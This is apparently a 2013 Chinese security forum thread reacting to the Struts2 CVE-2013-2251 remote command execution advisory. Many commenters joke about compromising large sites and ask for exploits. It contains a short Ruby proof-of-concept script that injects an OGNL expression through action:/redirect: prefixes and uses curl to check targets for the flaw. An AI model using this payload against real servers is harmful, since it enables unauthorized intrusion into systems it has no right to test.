秒杀

客官 要轻点了 疼

@xsser 某些大厂商官网都存在漏洞...

@园长 struts真应该被废弃了！

前排黄金广告位招租。

园长就等你这个呢，哈哈

@xsser Who should read this   All Struts 2 developers and users
Impact of vulnerability   Remote command execution
Maximum security rating   Highly Critical
Recommendation   Developers should immediately upgrade to Struts 2.3.15.1
Affected Software   Struts 2.0.0 - Struts 2.3.15
Reporter   Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE Identifier  CVE-2013-2251
还是SpringMvc给力，Struts2也不能说是不能用，要是不用OGNL就好了

看来struts框架 太不安全了

要死一大批了

@xsser 我擦wooyun的节奏这么快，有点跟不上节拍了。。
2013-07-17  淘宝某分站最新Struts命令执行漏洞第二枚  0/0  print
2013-07-17  淘宝某分站最新Struts命令执行漏洞一枚  2/2  Finger

发个预警吧。可不想又刷wooyun了

又是大量连载的节奏

@GaRY 已经发预警了 看微博

struts2没有问题,是OGNL实现的这个对象树功能太牛X了,其实像struts1简单搞个反射实现也就够了!

@shine ognl 让s2变成了一个残废，每天都在治病，就是治不好。还不如把那只病脚锯了安个假肢。

struts不出问题就没事 一出问题就死一大堆

预警都发了，这个没必要在提交到乌云了吧。

又一场风暴

前台刷分已在上演

@网监

刷分开始

淫荡的一天开始了

@xsser 发招聘需要赞助费吗？

奇葩玩意儿  废弃了比较好

晚上回来试下，貌似好多大站中招了？看来好多大站要被日了。

发现可以执行。不错

叫牛人构造post  写工具。哈哈

求exp

成了万人轮的玩意了》。。。

真快。快成灾区了

好多站要沦陷了

@园长 下次出洞，付费购买。5位数

这个影响让我的百合服务器沦陷的洞被你们忽略了WooYun: 百合网某分站源码下载导致服务器沦陷

准备试试某处内网，看看有没有洞。

牛淫 快写工具啊

1 require 'cgi'                                                                                                        
   2                                                                                                                      
   3 poc =  CGI.escape("${")                                                                                              
   4 poc += CGI.escape("#a_str=new java.lang.String('xxooxxoo'),")                                                        
   5 poc += CGI.escape("#b_str=new java.lang.String('ooxxooxx'),")                                                        
   6 poc += CGI.escape("#a_resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),")                
   7 poc += CGI.escape("#a_resp.getWriter().println(#a_str.concat(#b_str)),")                                            
   8 poc += CGI.escape("#a_resp.getWriter().flush(),")                                                                    
   9 poc += CGI.escape("#a_resp.getWriter().close()")                                                                    
  10 poc += CGI.escape("}")                                                                                              
  11                                                                                                                      
  12 prefixes = ["action:",                                                                                              
  13     "redirect:",                                                                                                    
  14     "redirectAction:"]                                                                                              
  15 prefixes.each do |prefix|                                                                                            
  16     new_poc = ARGV[0] + "?" + prefix + poc                                                                          
  17     if /xxooxxooooxxooxx/ =~ `curl -g '#{new_poc}' 2>/dev/null`                                                      
  18         puts new_poc                                                                                                
  19     end                                                                                                              
  20 end

无损测试版

前排位置都没有了？

又被刷屏了。。。。

@clozure ..直接上链接啊

直接上链接啊  +1

@clozure 残疾人大牛厉害死了

有没有关键字

@hqdvista 噗嗤

@混世魔王
漏洞又不是他发现的，是官方发出来的。还5位数，钱多人傻啊，真被你雷到了

无exp........

求exp

看起来是又开始了。。

刷都飞起了，哎

前50！！插入

吓到我了

刷分已开始，哈哈

@园长 园长，求exp   o(╯□╰)o

看着struts就蛋疼。

又来大姨妈，总让我这种潜水的人不淡定。。。

@园长 这个就别放出来了吧，留点门槛吧。。

@ACGT 已删，听你的GETSHELL还是不发出来了。

Windows的可用么

悲催啊！

工具呢？

等工具猫出全自动工具

为啥写完文件后自动返回页面 不能写入吗？